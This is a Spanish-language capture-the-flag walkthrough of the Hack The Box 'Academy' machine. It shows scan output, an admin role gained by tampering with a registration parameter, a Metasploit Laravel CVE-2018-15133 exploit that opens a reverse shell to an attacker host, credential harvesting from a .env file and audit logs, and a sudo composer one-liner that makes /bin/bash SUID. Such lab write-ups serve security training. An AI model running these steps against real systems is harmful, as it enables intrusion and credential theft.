Academy
Academy
Academy Linux · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.5.74
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-14 00:36 +0100
Nmap scan report for 10.129.5.74
Host is up (0.054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.25 seconds
La web inicial nos ofrece logearnos o registrarnos
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(pmartinezr㉿kali)-[~]
└─$ dirsearch -u http://academy.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/pmartinezr/reports/http_academy.htb/_26-02-14_00-47-43.txt
Target: http://academy.htb/
[00:47:43] Starting:
[00:47:47] 403 - 276B - /.htaccess.orig
[00:47:47] 403 - 276B - /.ht_wsr.txt
[00:47:47] 403 - 276B - /.htaccess.save
[00:47:47] 403 - 276B - /.htaccess.bak1
[00:47:47] 403 - 276B - /.htaccess.sample
[00:47:47] 403 - 276B - /.htaccess_extra
[00:47:47] 403 - 276B - /.htaccess_orig
[00:47:47] 403 - 276B - /.htaccess_sc
[00:47:47] 403 - 276B - /.htaccessOLD
[00:47:47] 403 - 276B - /.htaccessBAK
[00:47:47] 403 - 276B - /.htaccessOLD2
[00:47:47] 403 - 276B - /.htm
[00:47:47] 403 - 276B - /.html
[00:47:47] 403 - 276B - /.htpasswd_test
[00:47:47] 403 - 276B - /.httr-oauth
[00:47:47] 403 - 276B - /.htpasswds
[00:47:49] 403 - 276B - /.php
[00:47:56] 200 - 968B - /admin.php
[00:48:15] 200 - 0B - /config.php
[00:48:26] 302 - 54KB - /home.php -> login.php
[00:48:27] 301 - 311B - /images -> http://academy.htb/images/
[00:48:27] 403 - 276B - /images/
[00:48:32] 200 - 964B - /login.php
[00:48:47] 200 - 1001B - /register.php
[00:48:49] 403 - 276B - /server-status
[00:48:50] 403 - 276B - /server-status/
Dirsearch descubre un página admin.php`
Para conseguir permisos de administrador en la web basta con modificar el request, que se realiza durante el registro, si nos fijamos, el parámetro roleid se envía con un 0, así que decidí modificarlo para enviar 1 suponiendo que 1 es rol de administrador.
Ahora sí, al logarnos como administrador en la página admin.php descubrimos un nuevo dominio el cual incluiremos en nuestro /etc/hosts dev-staging-01.academy.htb para poder acceder y ver que tenemos allí.
Nos vamos a encontrar con un panel de desarrollo Laravel.
Tras investigar un poco descubrimos una API key,
CVE-2018-15133
Haciendo una búsqueda en Internet resulta que tenemos un módulo de Metasploit para aprovechar el CVE
🪲 Explotación:
https://www.exploit-db.com/exploits/47129
👽 Acciones:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.74:4444
[*] Command shell session 1 opened (10.10.14.74:4444 -> 10.129.5.78:46262) at 2026-02-14 01:52:34 +0100
whoami
www-data
www-data@academy:/home$ ls -ltR
ls -ltR
.:
total 24
drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3n
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d
./mrb3n:
total 0
El exploit funciona perfectamente y comienzo el reconocimiento y enumeración de posibles usuarios
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
Tras investigar un poco descubro que existe un archivo .env en la carpeta academy , además de una password mySup3rP4s5w0rd!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
total 4
-r--r----- 1 cry0l1t3 cry0l1t3 33 Feb 14 00:01 user.txt
┌──(pmartinezr㉿kali)-[~/htb/academy]
└─$ echo "drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3n
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d" | awk '{print $3}'
mrb3n
cry0l1t3
egre55
g0blin
ch4p
21y4d
Elaboro una lista de usuarios y ya nos da una pista de que usuario debemos suplantar.
1
2
3
4
5
6
7
8
9
www-data@academy:/var/www/html/academy$ su - cry0l1t3
su - cry0l1t3
Password: mySup3rP4s5w0rd!!
$ pwd
pwd
/home/cry0l1t3
$ cat user.txt
cat user.txt
bf155f0b6a105f12f*******
Efectivamente el usuario cry0l1t3 utiliza la password que encontramos. Tenemos la primera bandera.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
cry0l1t3@academy:/var/log$ aureport --tty
TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>
Descubro que el sistema tiene instalado la utilidad aureport que es útil para mirar los logs. Al parecer alguien tecleo mal el comando su y esto ser guardo mostrado que usuario y su password mrb3n mrb3n_Ac@d3my!.
1
2
3
4
5
6
7
8
9
10
11
cry0l1t3@academy:/var/log$ su mrb3n
Password:
$ whoami
mrb3n
$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
El comando sudo, nos desvela un vector de escalada de privilegios.
https://gtfobins.org/gtfobins/composer/#sudo
1
echo '{"scripts":{"x":"chmod u+s /bin/bash"}}' >composer.json;sudo composer run-script x
No hice exactamente la recomendación del gtfobins pero lo importante es que funciona.
Esta entrada está licenciada bajo CC BY 4.0 por el autor.